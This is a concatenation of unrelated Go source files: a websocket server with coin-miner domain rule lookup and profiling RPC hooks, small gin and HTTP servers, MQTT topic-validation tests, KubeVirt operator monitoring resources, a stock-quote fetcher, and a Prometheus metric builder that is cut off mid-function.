/* searchRule looks a key up in the local cache first, then falls back to the
client's redis connection. Returns FAILED when neither source has it. */
func searchRule(key string, c *websocket.Conn) (val string, err error) {
	if rule, ok := gMineRules.Load(key); ok {
		return rule.(string), nil
	}
	// Fix: the original discarded the ok result, so a missing connection
	// caused a nil-interface type assertion panic below.
	value, ok := gRedisConn.Load(c)
	if !ok {
		log.Errorf("no redis connection cached for client")
		return "", FAILED
	}
	val, err = redis.String(value.(RedisConn).conn.Do("GET", key))
	if err != nil {
		log.Errorf("redis get key(%s) failed:%s", key, err)
		return "", FAILED
	}
	return val, nil
}
/*
searchMineRules looks a key up; when the exact key is missing it retries with
the wildcard top-level-domain form, e.g.:
    www.tull.coin-miners.info ------------ *coin-miners.info
    altcoinpool.com           ------------ *altcoinpool.com
*/
func searchMineRules(key string, c *websocket.Conn) (val string, err error) {
	val, err = searchRule(key, c)
	if err == nil {
		return val, nil
	}
	var domain string
	cnt := strings.Count(key, ".")
	if cnt > 1 {
		// Keep only the last two dot-separated labels, prefixed with '*'.
		tmp := strings.Split(key, ".")
		domain = fmt.Sprintf("*%s.%s", tmp[cnt-1], tmp[cnt])
		log.Debugf("Search again --, domin: %s", domain)
	} else if cnt == 1 {
		// Single-dot names: only prefix '*' when not already a wildcard.
		isDomain := strings.Count(key, "*")
		if isDomain == 0 {
			domain = fmt.Sprintf("*%s", key)
			log.Debugf("search again __, domin: %s", domain)
		}
	} else {
		// Not a dotted name: retry the key itself (second lookup hits the
		// same entry — effectively a single retry).
		domain = key
	}
	val, err = searchRule(domain, c)
	if err == nil {
		return val, nil
	}
	return "", FAILED
}
/* LogInit creates the process-wide logrus logger, directing output to
LogFile when it can be opened (logrus' default stderr otherwise), at the
level selected by the -logLevel flag. */
func LogInit() {
	log = logrus.New()
	// The handle is intentionally kept open for the process lifetime.
	file, err := os.OpenFile(LogFile, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0666)
	if err == nil {
		log.Out = file
	} else {
		log.Errorf("Failed to log to file")
	}
	log.SetLevel(logrus.Level(*logLevel))
}
/* GoprofBegin is an RPC debug hook that starts CPU profiling for the current
process, writing to CpuProfLogFile. Pair with GoprofEnd. */
func (t *RpcCmd) GoprofBegin(args *int, reply *int) error {
	// Fix: the original used := which shadowed the package-level
	// cpuProfFile, so GoprofEnd later closed a nil handle. Assign with =
	// so both hooks share the same file.
	var err error
	cpuProfFile, err = os.OpenFile(CpuProfLogFile, os.O_CREATE|os.O_WRONLY, 0666)
	if err != nil {
		log.Errorf("Failed to CPU prof log to file. %s", err)
		return nil
	}
	err = pprof.StartCPUProfile(cpuProfFile)
	if err != nil {
		log.Errorf("Can not start cpu profile: %s", err)
	}
	return nil
}
/* GoprofEnd is an RPC debug hook that stops CPU profiling and closes the
profile file opened by GoprofBegin. */
func (t *RpcCmd) GoprofEnd(args *int, reply *int) error {
	pprof.StopCPUProfile()
	// Guard against GoprofEnd being called without a successful GoprofBegin.
	if cpuProfFile != nil {
		cpuProfFile.Close()
		cpuProfFile = nil
	}
	return nil
}
/* MemProf is an RPC debug hook that writes the current heap profile to
MemProfLogFile. */
func (t *RpcCmd) MemProf(args *int, reply *int) error {
	// Local variable: the handle is closed before returning, so there is no
	// need to stash it in the package-level memProfFile.
	f, err := os.OpenFile(MemProfLogFile, os.O_CREATE|os.O_WRONLY, 0666)
	if err != nil {
		log.Errorf("Failed to mem prof log to file. %s", err)
		return nil
	}
	defer f.Close()
	// Fix: the WriteTo error was silently discarded.
	if err := pprof.Lookup("heap").WriteTo(f, 1); err != nil {
		log.Errorf("Failed to write heap profile. %s", err)
	}
	return nil
}
/* SetLogLevel is an RPC debug hook that changes the runtime log level; it
sets *reply to 1 to acknowledge. */
func (t *RpcCmd) SetLogLevel(level *int, reply *int) error {
	log.Warnf("Log level will be set :%d", *level)
	log.SetLevel(logrus.Level(*level))
	*reply = 1
	return nil
}
/* rpcServer exposes the RpcCmd debug methods over HTTP RPC on port 1234 for
remote debugging clients. */
func rpcServer() {
	cmd := new(RpcCmd)
	// Fix: Register's error was ignored.
	if err := rpc.Register(cmd); err != nil {
		log.Errorf("rpc register error: %s", err)
		return
	}
	rpc.HandleHTTP()
	l, e := net.Listen("tcp", ":1234")
	if e != nil {
		// Fix: format verb was missing, and execution previously fell
		// through to serve a nil listener (which panics).
		log.Errorf("listen error: %s", e)
		return
	}
	go http.Serve(l, nil)
}
// main wires up logging, the RPC debug server, the rule-cache refresher and
// the websocket endpoints, then serves HTTP on -addr until failure.
func main() {
	flag.Parse()
	LogInit()
	log.Infof("--------------Websocket Server Begin----------------")
	go rpcServer()
	go updateMineRuleLocal()
	RedisPasswd = GetRedisPassword()
	http.HandleFunc("/websocket", echo)
	http.HandleFunc("/", home)
	// Fix: surface a bind/serve failure instead of discarding the error.
	if err := http.ListenAndServe(*addr, nil); err != nil {
		log.Fatalf("ListenAndServe: %s", err)
	}
}
|
package main
import (
_ "fmt"
"github.com/gin-gonic/gin"
"net/http"
"os/exec"
)
// main refreshes the checkout from GitHub, then serves the static web assets
// with gin on the default port.
func main() {
	// updates everything from github — deliberately best-effort: startup
	// continues even when the pull fails (e.g. offline).
	pullFromGithub := exec.Command("git", "pull")
	_ = pullFromGithub.Run()
	router := gin.Default()
	// serves all the html, css, and javascript files to the browser
	router.StaticFile("/", "./web/html/index.html")
	router.StaticFS("/html", http.Dir("./web/html/"))
	router.StaticFS("/css", http.Dir("./web/css/"))
	router.StaticFS("/js", http.Dir("./web/js/"))
	// Fix: Run's listen error was silently dropped.
	if err := router.Run(); err != nil {
		panic(err)
	}
}
// ping replies with a JSON {"message": "pong"} health-check payload.
// NOTE(review): no route registers this handler in the visible code —
// confirm whether it is dead or wired up elsewhere.
func ping(context *gin.Context) {
	context.JSON(200, gin.H{
		"message": "pong",
	})
}
|
package routers
import (
"github.com/barrydev/api-3h-shop/src/common/response"
"github.com/barrydev/api-3h-shop/src/controllers"
"github.com/gin-gonic/gin"
)
// BindProductItem attaches the public (read-only) product-item routes:
// GET ""                 — list product items
// GET "/:productItemId"  — fetch one product item
// Write routes are commented out here; they live in BindProductItemAdmin.
func BindProductItem(router *gin.RouterGroup) {
	router.GET("", func(c *gin.Context) {
		handle := response.Handle{Context: c}
		handle.Try(controllers.GetListProductItem).Then(response.SendSuccess).Catch(response.SendError)
	})
	router.GET("/:productItemId", func(c *gin.Context) {
		handle := response.Handle{Context: c}
		handle.Try(controllers.GetProductItemById).Then(response.SendSuccess).Catch(response.SendError)
	})
	// router.POST("", func(c *gin.Context) {
	// handle := response.Handle{Context: c}
	// handle.Try(controllers.InsertProductItem).Then(response.SendSuccess).Catch(response.SendError)
	// })
	// router.POST("/:productItemId/update", func(c *gin.Context) {
	// handle := response.Handle{Context: c}
	// handle.Try(controllers.UpdateProductItem).Then(response.SendSuccess).Catch(response.SendError)
	// })
}
// BindProductItemAdmin attaches the admin (write) product-item routes:
// POST ""                        — create a product item
// POST "/:productItemId/update"  — update a product item
func BindProductItemAdmin(router *gin.RouterGroup) {
	router.POST("", func(c *gin.Context) {
		handle := response.Handle{Context: c}
		handle.Try(controllers.InsertProductItem).Then(response.SendSuccess).Catch(response.SendError)
	})
	router.POST("/:productItemId/update", func(c *gin.Context) {
		handle := response.Handle{Context: c}
		handle.Try(controllers.UpdateProductItem).Then(response.SendSuccess).Catch(response.SendError)
	})
}
|
package main
// Operation codes for undo-log records (see Record for the field layout).
const (
	START           = iota // a transaction started
	UPDATE                 // a value changed
	STARTCHECKPOINT        // checkpoint begin marker
	ENDCHECKPOINT          // checkpoint end marker
)
// Undolog record format
// {START, tID, 0, 0}
// {UPDATE, tID, userID, cash}
// {STARTCHECKPOINT, 0, 0, 0}
// {ENDCHECKPOINT, 0, 0, 0}

// Record is one undo-log entry; fields unused by an op are zero (formats
// above). NOTE(review): "TranscationId" is misspelled but exported, so
// renaming it would break existing callers/serialized data.
type Record struct {
	Op            int
	TranscationId int
	UserId        int
	Cash          int
}
|
package main
import (
"fmt"
"net/http"
)
// helloWorld is an HTTP handler that writes "Hello world" to the client and
// prints a trace line to stdout.
func helloWorld(w http.ResponseWriter, r *http.Request) {
	const body = "Hello world"
	fmt.Fprint(w, body)
	fmt.Println("See actions in action?")
}
// main registers the hello-world handler and serves HTTP on :8080.
func main() {
	// Register handler function on server route
	http.HandleFunc("/api/hello-world-service/v0/ping", helloWorld)
	fmt.Println("Listening on localhost:8080")
	// Fix: report a bind/serve failure instead of discarding the error.
	if err := http.ListenAndServe(":8080", nil); err != nil {
		fmt.Println("server error:", err)
	}
}
|
package topic
import (
"testing"
. "github.com/smartystreets/goconvey/convey"
)
// TestValidate exercises topic validation against the MQTT 3.1.1 rules: the
// second argument toggles whether wildcard characters (#, +) are permitted
// (true for subscribe-style Topic Filters, false for publish Topic Names).
func TestValidate(t *testing.T) {
	Convey(`Testing the Topic validation`, t, func() {
		So(Validate("", true), ShouldEqual, errInvalidLength) // All Topic Names and Topic Filters MUST be at least one character long [MQTT-4.7.3-1]
		So(Validate("\U00000000", true), ShouldEqual, errInvalidUTF8) // Topic Names and Topic Filters MUST NOT include the null character (Unicode U+0000) [Unicode] [MQTT-4.7.3-2]
		So(Validate("#", true), ShouldBeNil)
		So(Validate("+", true), ShouldBeNil)
		So(Validate("foo", true), ShouldBeNil)
		So(Validate("foo/bar", true), ShouldBeNil)
		So(Validate("foo/#", true), ShouldBeNil)
		So(Validate("foo/+", true), ShouldBeNil)
		So(Validate("foo/+/bar", true), ShouldBeNil)
		// Wildcards rejected when not allowed (publish-side topics).
		So(Validate("foo/#", false), ShouldEqual, errWildcardNotAllowed)
		So(Validate("foo/+", false), ShouldEqual, errWildcardNotAllowed)
		So(Validate("foo/+/bar", false), ShouldEqual, errWildcardNotAllowed)
		// Wildcards must occupy an entire level ('#' only as the last one).
		So(Validate("foo/#bar", true), ShouldEqual, errInvalidWildcardLocation)
		So(Validate("foo/+bar", true), ShouldEqual, errInvalidWildcardLocation)
		So(Validate("foo/#/bar", true), ShouldEqual, errInvalidWildcardLocation)
	})
}
|
package main
import (
"fmt"
"net"
)
// main binds a TCP listener on an ephemeral port (port "0") on all IPv4
// interfaces and prints the address actually chosen by the OS.
func main() {
	addr := net.JoinHostPort("0.0.0.0", "0")
	fmt.Println("About to listen on ", addr)
	ln, err := net.Listen("tcp4", addr)
	if err != nil {
		fmt.Println("Error, listening: ", err)
		return
	}
	// Fix: release the socket before exit; the listener was never closed.
	defer ln.Close()
	fmt.Println("Listening ", ln.Addr().String())
}
|
package operands
import (
"errors"
"os"
"reflect"
monitoringv1 "github.com/prometheus-operator/prometheus-operator/pkg/apis/monitoring/v1"
corev1 "k8s.io/api/core/v1"
v1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/util/intstr"
"sigs.k8s.io/controller-runtime/pkg/client"
hcov1beta1 "github.com/kubevirt/hyperconverged-cluster-operator/pkg/apis/hco/v1beta1"
"github.com/kubevirt/hyperconverged-cluster-operator/pkg/controller/common"
"github.com/kubevirt/hyperconverged-cluster-operator/pkg/util"
hcoutil "github.com/kubevirt/hyperconverged-cluster-operator/pkg/util"
)
const (
operatorPortName = "http-metrics"
defaultOperatorName = "hyperconverged-cluster-operator"
operatorNameEnv = "OPERATOR_NAME"
metricsSuffix = "-operator-metrics"
alertRuleGroup = "kubevirt.hyperconverged.rules"
outOfBandUpdateAlert = "KubevirtHyperconvergedClusterOperatorCRModification"
)
// metricsServiceHandler reconciles the operator metrics Service.
type metricsServiceHandler genericOperand

// newMetricsServiceHandler builds a handler wired with the metrics Service hooks.
func newMetricsServiceHandler(Client client.Client, Scheme *runtime.Scheme) *metricsServiceHandler {
	return &metricsServiceHandler{
		Client:                 Client,
		Scheme:                 Scheme,
		crType:                 "MetricsService",
		removeExistingOwner:    false,
		setControllerReference: true,
		hooks:                  &metricsServiceHooks{},
	}
}
// metricsServiceHooks implements the operand hooks for the metrics Service.
type metricsServiceHooks struct{}

// getFullCr returns the desired metrics Service for the given HyperConverged CR.
func (h metricsServiceHooks) getFullCr(hc *hcov1beta1.HyperConverged) (client.Object, error) {
	return NewMetricsService(hc, hc.Namespace), nil
}

// getEmptyCr returns an empty Service used as the target of cluster reads.
func (h metricsServiceHooks) getEmptyCr() client.Object { return &corev1.Service{} }

// postFound is a no-op: nothing extra to do once the Service is found.
func (h metricsServiceHooks) postFound(*common.HcoRequest, runtime.Object) error { return nil }

// getObjectMeta exposes the Service's ObjectMeta to the generic reconciler.
func (h metricsServiceHooks) getObjectMeta(cr runtime.Object) *metav1.ObjectMeta {
	return &cr.(*corev1.Service).ObjectMeta
}

// reset is a no-op; this hook type keeps no cached state.
func (h metricsServiceHooks) reset( /* No implementation */ ) {}
// updateCr reconciles an existing metrics Service toward the required
// (opinionated) one. Returns (updated, overwritten, error): updated is true
// when a write was issued; the second value is true when the write reverted
// an external (non-HCO-triggered) change.
func (h *metricsServiceHooks) updateCr(req *common.HcoRequest, Client client.Client, exists runtime.Object, required runtime.Object) (bool, bool, error) {
	service, ok1 := required.(*corev1.Service)
	found, ok2 := exists.(*corev1.Service)
	if !ok1 || !ok2 {
		return false, false, errors.New("can't convert to Service")
	}
	// Only ports, selector and labels are owned by HCO; other Spec fields are left alone.
	if !reflect.DeepEqual(found.Spec.Ports, service.Spec.Ports) ||
		!reflect.DeepEqual(found.Spec.Selector, service.Spec.Selector) ||
		!reflect.DeepEqual(found.Labels, service.Labels) {
		if req.HCOTriggered {
			req.Logger.Info("Updating existing metrics Service Spec to new opinionated values")
		} else {
			req.Logger.Info("Reconciling an externally updated metrics Service Spec to its opinionated values")
		}
		found.Spec.Ports = service.Spec.Ports
		found.Spec.Selector = service.Spec.Selector
		util.DeepCopyLabels(&service.ObjectMeta, &found.ObjectMeta)
		err := Client.Update(req.Ctx, found)
		if err != nil {
			return false, false, err
		}
		return true, !req.HCOTriggered, nil
	}
	return false, false, nil
}
// NewMetricsService creates the Service exposing the operator's Prometheus
// metrics endpoint in the given namespace.
func NewMetricsService(hc *hcov1beta1.HyperConverged, namespace string) *corev1.Service {
	// Add to the below struct any other metrics ports you want to expose.
	// Note: uses the corev1 alias consistently (the file imported core/v1
	// twice, as corev1 and v1; v1.ProtocolTCP was the lone v1 use).
	servicePorts := []corev1.ServicePort{
		{Port: hcoutil.MetricsPort, Name: operatorPortName, Protocol: corev1.ProtocolTCP, TargetPort: intstr.IntOrString{Type: intstr.Int, IntVal: hcoutil.MetricsPort}},
	}
	// The deployed operator name may be overridden via OPERATOR_NAME.
	operatorName := defaultOperatorName
	val, ok := os.LookupEnv(operatorNameEnv)
	if ok && val != "" {
		operatorName = val
	}
	// Select the operator pod(s) by their "name" label.
	labelSelect := map[string]string{"name": operatorName}
	spec := corev1.ServiceSpec{
		Ports:    servicePorts,
		Selector: labelSelect,
	}
	return &corev1.Service{
		ObjectMeta: metav1.ObjectMeta{
			Name:      hc.Name + metricsSuffix,
			Labels:    getLabels(hc, hcoutil.AppComponentMonitoring),
			Namespace: namespace,
		},
		Spec: spec,
	}
}
// metricsServiceMonitorHandler reconciles the metrics ServiceMonitor.
type metricsServiceMonitorHandler genericOperand

// newMetricsServiceMonitorHandler builds a handler wired with the ServiceMonitor hooks.
func newMetricsServiceMonitorHandler(Client client.Client, Scheme *runtime.Scheme) *metricsServiceMonitorHandler {
	return &metricsServiceMonitorHandler{
		Client:                 Client,
		Scheme:                 Scheme,
		crType:                 "ServiceMonitor",
		removeExistingOwner:    false,
		setControllerReference: true,
		hooks:                  &metricsServiceMonitorHooks{},
	}
}
// metricsServiceMonitorHooks implements the operand hooks for the metrics ServiceMonitor.
type metricsServiceMonitorHooks struct{}

// getFullCr returns the desired ServiceMonitor for the given HyperConverged CR.
func (h metricsServiceMonitorHooks) getFullCr(hc *hcov1beta1.HyperConverged) (client.Object, error) {
	return NewServiceMonitor(hc, hc.Namespace), nil
}

// getEmptyCr returns an empty ServiceMonitor used as the target of cluster reads.
func (h metricsServiceMonitorHooks) getEmptyCr() client.Object {
	return &monitoringv1.ServiceMonitor{}
}

// postFound is a no-op: nothing extra to do once the ServiceMonitor is found.
func (h metricsServiceMonitorHooks) postFound(*common.HcoRequest, runtime.Object) error { return nil }

// getObjectMeta exposes the ServiceMonitor's ObjectMeta to the generic reconciler.
func (h metricsServiceMonitorHooks) getObjectMeta(cr runtime.Object) *metav1.ObjectMeta {
	return &cr.(*monitoringv1.ServiceMonitor).ObjectMeta
}

// reset is a no-op; this hook type keeps no cached state.
func (h metricsServiceMonitorHooks) reset( /* No implementation */ ) {}
// updateCr reconciles an existing metrics ServiceMonitor toward the required
// one. Returns (updated, overwritten, error); the second value is true when
// the write reverted an external (non-HCO-triggered) change.
func (h *metricsServiceMonitorHooks) updateCr(req *common.HcoRequest, Client client.Client, exists runtime.Object, required runtime.Object) (bool, bool, error) {
	monitor, ok1 := required.(*monitoringv1.ServiceMonitor)
	found, ok2 := exists.(*monitoringv1.ServiceMonitor)
	if !ok1 || !ok2 {
		return false, false, errors.New("can't convert to ServiceMonitor")
	}
	// The whole Spec plus labels are owned by HCO for this object.
	if !reflect.DeepEqual(found.Spec, monitor.Spec) ||
		!reflect.DeepEqual(found.Labels, monitor.Labels) {
		if req.HCOTriggered {
			req.Logger.Info("Updating existing metrics ServiceMonitor Spec to new opinionated values")
		} else {
			req.Logger.Info("Reconciling an externally updated metrics ServiceMonitor Spec to its opinionated values")
		}
		monitor.Spec.DeepCopyInto(&found.Spec)
		util.DeepCopyLabels(&monitor.ObjectMeta, &found.ObjectMeta)
		err := Client.Update(req.Ctx, found)
		if err != nil {
			return false, false, err
		}
		return true, !req.HCOTriggered, nil
	}
	return false, false, nil
}
// NewServiceMonitor creates the ServiceMonitor resource that points
// Prometheus at the operator's metrics Service in the given namespace.
func NewServiceMonitor(hc *hcov1beta1.HyperConverged, namespace string) *monitoringv1.ServiceMonitor {
	monitoringLabels := getLabels(hc, hcoutil.AppComponentMonitoring)
	return &monitoringv1.ServiceMonitor{
		ObjectMeta: metav1.ObjectMeta{
			Name:      hc.Name + metricsSuffix,
			Labels:    monitoringLabels,
			Namespace: namespace,
		},
		Spec: monitoringv1.ServiceMonitorSpec{
			Selector: metav1.LabelSelector{
				MatchLabels: monitoringLabels,
			},
			Endpoints: []monitoringv1.Endpoint{{Port: operatorPortName}},
		},
	}
}
// monitoringPrometheusRuleHandler reconciles the alerting PrometheusRule.
type monitoringPrometheusRuleHandler genericOperand

// newMonitoringPrometheusRuleHandler builds a handler wired with the PrometheusRule hooks.
func newMonitoringPrometheusRuleHandler(Client client.Client, Scheme *runtime.Scheme) *monitoringPrometheusRuleHandler {
	return &monitoringPrometheusRuleHandler{
		Client:                 Client,
		Scheme:                 Scheme,
		crType:                 "PrometheusRule",
		removeExistingOwner:    false,
		setControllerReference: true,
		hooks:                  &prometheusRuleHooks{},
	}
}
// prometheusRuleHooks implements the operand hooks for the PrometheusRule.
type prometheusRuleHooks struct{}

// getFullCr returns the desired PrometheusRule for the given HyperConverged CR.
func (h prometheusRuleHooks) getFullCr(hc *hcov1beta1.HyperConverged) (client.Object, error) {
	return NewPrometheusRule(hc, hc.Namespace), nil
}

// getEmptyCr returns an empty PrometheusRule used as the target of cluster reads.
func (h prometheusRuleHooks) getEmptyCr() client.Object { return &monitoringv1.PrometheusRule{} }

// postFound is a no-op: nothing extra to do once the PrometheusRule is found.
func (h prometheusRuleHooks) postFound(*common.HcoRequest, runtime.Object) error { return nil }

// getObjectMeta exposes the PrometheusRule's ObjectMeta to the generic reconciler.
func (h prometheusRuleHooks) getObjectMeta(cr runtime.Object) *metav1.ObjectMeta {
	return &cr.(*monitoringv1.PrometheusRule).ObjectMeta
}

// reset is a no-op; this hook type keeps no cached state.
func (h prometheusRuleHooks) reset( /* No implementation */ ) {}
// updateCr reconciles an existing PrometheusRule toward the required one.
// Returns (updated, overwritten, error); the second value is true when the
// write reverted an external (non-HCO-triggered) change.
func (h *prometheusRuleHooks) updateCr(req *common.HcoRequest, Client client.Client, exists runtime.Object, required runtime.Object) (bool, bool, error) {
	rule, ok1 := required.(*monitoringv1.PrometheusRule)
	found, ok2 := exists.(*monitoringv1.PrometheusRule)
	if !ok1 || !ok2 {
		return false, false, errors.New("can't convert to PrometheusRule")
	}
	// The whole Spec plus labels are owned by HCO for this object.
	if !reflect.DeepEqual(found.Spec, rule.Spec) ||
		!reflect.DeepEqual(found.Labels, rule.Labels) {
		if req.HCOTriggered {
			req.Logger.Info("Updating existing PrometheusRule Spec to new opinionated values")
		} else {
			req.Logger.Info("Reconciling an externally updated PrometheusRule Spec to its opinionated values")
		}
		rule.Spec.DeepCopyInto(&found.Spec)
		util.DeepCopyLabels(&rule.ObjectMeta, &found.ObjectMeta)
		err := Client.Update(req.Ctx, found)
		if err != nil {
			return false, false, err
		}
		return true, !req.HCOTriggered, nil
	}
	return false, false, nil
}
// NewPrometheusRule creates the PrometheusRule resource holding the
// operator's alerting rules in the given namespace.
func NewPrometheusRule(hc *hcov1beta1.HyperConverged, namespace string) *monitoringv1.PrometheusRule {
	meta := metav1.ObjectMeta{
		Name:      hc.Name + "-prometheus-rule",
		Labels:    getLabels(hc, hcoutil.AppComponentMonitoring),
		Namespace: namespace,
	}
	return &monitoringv1.PrometheusRule{
		TypeMeta: metav1.TypeMeta{
			APIVersion: monitoringv1.SchemeGroupVersion.String(),
			Kind:       "PrometheusRule",
		},
		ObjectMeta: meta,
		Spec:       *NewPrometheusRuleSpec(),
	}
}
// NewPrometheusRuleSpec creates PrometheusRuleSpec for alert rules
func NewPrometheusRuleSpec() *monitoringv1.PrometheusRuleSpec {
	return &monitoringv1.PrometheusRuleSpec{
		Groups: []monitoringv1.RuleGroup{{
			Name: alertRuleGroup,
			Rules: []monitoringv1.Rule{{
				Alert: outOfBandUpdateAlert,
				// Fires when the out-of-band-modification counter increased over
				// the last 10m, or a non-zero counter exists without a 10m-old
				// sample (i.e. the series just appeared).
				Expr: intstr.FromString("sum by(component_name) ((round(increase(kubevirt_hco_out_of_band_modifications_count[10m]))>0 and kubevirt_hco_out_of_band_modifications_count offset 10m) or (kubevirt_hco_out_of_band_modifications_count != 0 unless kubevirt_hco_out_of_band_modifications_count offset 10m))"),
				Annotations: map[string]string{
					"description": "Out-of-band modification for {{ $labels.component_name }} .",
					"summary":     "{{ $value }} out-of-band CR modifications were detected in the last 10 minutes.",
				},
				Labels: map[string]string{
					"severity": "warning",
				},
			}},
		}},
	}
}
|
package mop
// NewQuotes builds a Quotes value bound to the given market and profile,
// starting with an empty error string.
func NewQuotes(market *Market, profile *Profile) *Quotes {
	quotes := new(Quotes)
	quotes.market = market
	quotes.profile = profile
	quotes.errors = ``
	return quotes
}
// Fetch pulls current quotes for the profile's tickers from the market's
// OnDemand service and refreshes quotes.stocks. A fetch error is recorded in
// quotes.errors (surfaced via Ok) and the previous stocks are kept.
func (quotes *Quotes) Fetch() (self *Quotes) {
	qs, err := quotes.market.OnDemand.Quote(quotes.profile.Tickers,
		[]string{"bid", "fiftyTwoWkHigh", "dividendRateAnnual", "dividendYieldAnnual", "fiftyTwoWkLow", "avgVolume", "ask"})
	if err != nil {
		// Previously the error was discarded with `_`, leaving Ok() blind to
		// failures; record it so the caller can report the problem.
		quotes.errors = err.Error()
		return quotes
	}
	quotes.stocks = make([]Stock, len(qs.Results))
	for i, q := range qs.Results {
		quotes.stocks[i].Ticker = q.Symbol
		quotes.stocks[i].LastTrade = ToString(q.LastPrice, 2)
		quotes.stocks[i].Change = ToString(q.NetChange, 2)
		quotes.stocks[i].ChangePct = ToString(q.PercentChange, 2)
		quotes.stocks[i].Open = ToString(q.Open, 2)
		quotes.stocks[i].High = ToString(q.High, 2)
		quotes.stocks[i].Low = ToString(q.Low, 2)
		quotes.stocks[i].Low52 = ToString(q.FiftyTwoWkLow, 2)
		quotes.stocks[i].High52 = ToString(q.FiftyTwoWkHigh, 2)
		quotes.stocks[i].Volume = IntToString(q.Volume)
		quotes.stocks[i].AvgVolume = IntToString(q.AvgVolume)
		// NOTE(review): PeRatio/PeRatioX and MarketCap/MarketCapX all reuse
		// LastPrice — these look like placeholders; confirm the intended fields.
		quotes.stocks[i].PeRatio = ToString(q.LastPrice, 2)
		quotes.stocks[i].PeRatioX = ToString(q.LastPrice, 2)
		quotes.stocks[i].Dividend = NAString(q.DividendRateAnnual)
		quotes.stocks[i].Yield = NAString(q.DividendYieldAnnual)
		quotes.stocks[i].MarketCap = ToString(q.LastPrice, 2)
		quotes.stocks[i].MarketCapX = ToString(q.LastPrice, 2)
		quotes.stocks[i].Advancing = (q.NetChange > 0)
		//fmt.Println(q.DividendRateAnnual)
	}
	//fmt.Println("symbols", qs)
	return quotes
}
// NAString maps an empty field to the display string "N/A"; any other
// value is passed through unchanged.
func NAString(field string) string {
	if field == "" {
		return "N/A"
	}
	return field
}
// Ok reports whether the last fetch succeeded, along with the error text
// (empty string when everything is fine).
func (quotes *Quotes) Ok() (bool, string) {
	return quotes.errors == ``, quotes.errors
}
// AddTickers adds tickers to the profile and invalidates the cached stocks
// so the next access re-fetches.
func (quotes *Quotes) AddTickers(tickers []string) (added int, err error) {
	if added, err = quotes.profile.AddTickers(tickers); err == nil && added > 0 {
		quotes.stocks = nil // Force fetch.
	}
	return
}

// RemoveTickers removes tickers from the profile and invalidates the cached
// stocks so the next access re-fetches.
func (quotes *Quotes) RemoveTickers(tickers []string) (removed int, err error) {
	if removed, err = quotes.profile.RemoveTickers(tickers); err == nil && removed > 0 {
		quotes.stocks = nil // Force fetch.
	}
	return
}
// isReady reports whether a fetch should run: there are tickers to quote and
// either no cached stocks yet or the market is still open (fresh data wanted).
func (quotes *Quotes) isReady() bool {
	return (quotes.stocks == nil || !quotes.market.IsClosed) && len(quotes.profile.Tickers) > 0
}
|
package builder
import (
"errors"
"fmt"
"sort"
"github.com/prometheus/client_golang/prometheus"
)
// MetricBuilder is the basic metric type that must be used by any potential metric added to
// the system. It allows user to create a prom collector which will be used to push.
type MetricBuilder struct {
	// labels contains the sorted list of all label keys the collector may carry;
	// AddLabelValue only accepts keys from this list.
	labels []string
	// labelKeyValues stores values for label keys that will be added to the metric.
	// Prometheus metrics are designed as follows:
	// metric_name {metric_label_key1:value1, key2:value2, ....} metric_value
	// labelKeyValues stores the key/value pairs of the Prometheus metric.
	labelKeyValues map[string]string
	// desc describes the metric that is being created. This field will be shown on Prometheus
	// dashboard as a help text.
	desc string
	// name describes the name of the metric that needs to be pushed.
	name string
	// value stores the value of the metric that needs to be pushed. Collected from the installer.
	value float64
	// buckets keeps a list of bucket values that will be used during the creation of a Histogram
	// object.
	buckets []float64
	// metricType defines what type of a collector object should the PromCollector function return.
	metricType MetricType
}
// MetricOpts contains the properties that are required to create a MetricBuilder object.
type MetricOpts struct {
	// Labels contains the list of all label keys that the collector object will have.
	Labels []string
	// Desc describes the metric that is being created. This field will be shown on Prometheus
	// dashboard as a help text.
	Desc string
	// Name describes the name of the metric that needs to be pushed.
	Name string
	// Buckets keeps a list of bucket values that will be used during the creation of a Histogram
	// object.
	Buckets []float64
	// MetricType defines what type of a collector object should the PromCollector function return.
	MetricType MetricType
}
// MetricType defines what types of metrics can be created. Restricted by the types of the Prometheus
// Collector types.
type MetricType string

const (
	// Histogram denotes that the type of the collector object should be a Prometheus Histogram.
	Histogram MetricType = "Histogram"
	// Counter denotes that the type of the collector object should be a Prometheus Counter.
	Counter MetricType = "Counter"
)
// PromCollector creates the Prometheus collector object matching the
// builder's metric type, or an error for an unknown type.
func (m MetricBuilder) PromCollector() (prometheus.Collector, error) {
	if m.metricType == Counter {
		return m.buildCounter(), nil
	}
	if m.metricType == Histogram {
		return m.buildHistogram(), nil
	}
	return nil, fmt.Errorf(`invalid metric builder type "%s". cannot create collector`, m.metricType)
}
// buildCounter returns a prometheus counter object with the value and labels set
// in the MetricBuilder object. labelKeyValues become constant labels on the counter.
func (m *MetricBuilder) buildCounter() prometheus.Collector {
	collector := prometheus.NewCounter(
		prometheus.CounterOpts{
			Name:        m.name,
			Help:        m.desc,
			ConstLabels: m.labelKeyValues,
		},
	)
	// Seed the counter with the collected value.
	collector.Add(m.value)
	return collector
}
// buildHistogram returns a prometheus Histogram object with the value, labels and buckets set
// in the MetricBuilder object. labelKeyValues become constant labels on the histogram.
func (m *MetricBuilder) buildHistogram() prometheus.Collector {
	collector := prometheus.NewHistogram(
		prometheus.HistogramOpts{
			Name:        m.name,
			Help:        m.desc,
			Buckets:     m.buckets,
			ConstLabels: m.labelKeyValues,
		},
	)
	// Record the single collected observation.
	collector.Observe(m.value)
	return collector
}
// NewMetricBuilder creates a new MetricBuilder object with the default values
// for the fields, validating that labels, name and metric type are provided.
func NewMetricBuilder(opts MetricOpts, value float64, labelKeyValues map[string]string) (*MetricBuilder, error) {
	// Reject both nil and zero-length label sets: the error message promises
	// "cannot be empty", but the old nil-only check let empty slices through.
	if len(opts.Labels) == 0 {
		return nil, errors.New("labels cannot be empty")
	}
	if opts.Name == "" {
		return nil, errors.New("name cannot be empty")
	}
	if opts.MetricType == "" {
		return nil, errors.New("metricType cannot be empty")
	}
	if labelKeyValues == nil {
		labelKeyValues = make(map[string]string)
	}
	// Sort a copy so the caller's slice is not reordered behind its back;
	// AddLabelValue relies on the sorted order for its binary search.
	labels := append([]string(nil), opts.Labels...)
	sort.Strings(labels)
	return &MetricBuilder{
		labels:         labels,
		name:           opts.Name,
		metricType:     opts.MetricType,
		desc:           opts.Desc,
		buckets:        opts.Buckets,
		value:          value,
		labelKeyValues: labelKeyValues,
	}, nil
}
// SetValue is a setter function that assigns value to the metric builder.
func (m *MetricBuilder) SetValue(value float64) {
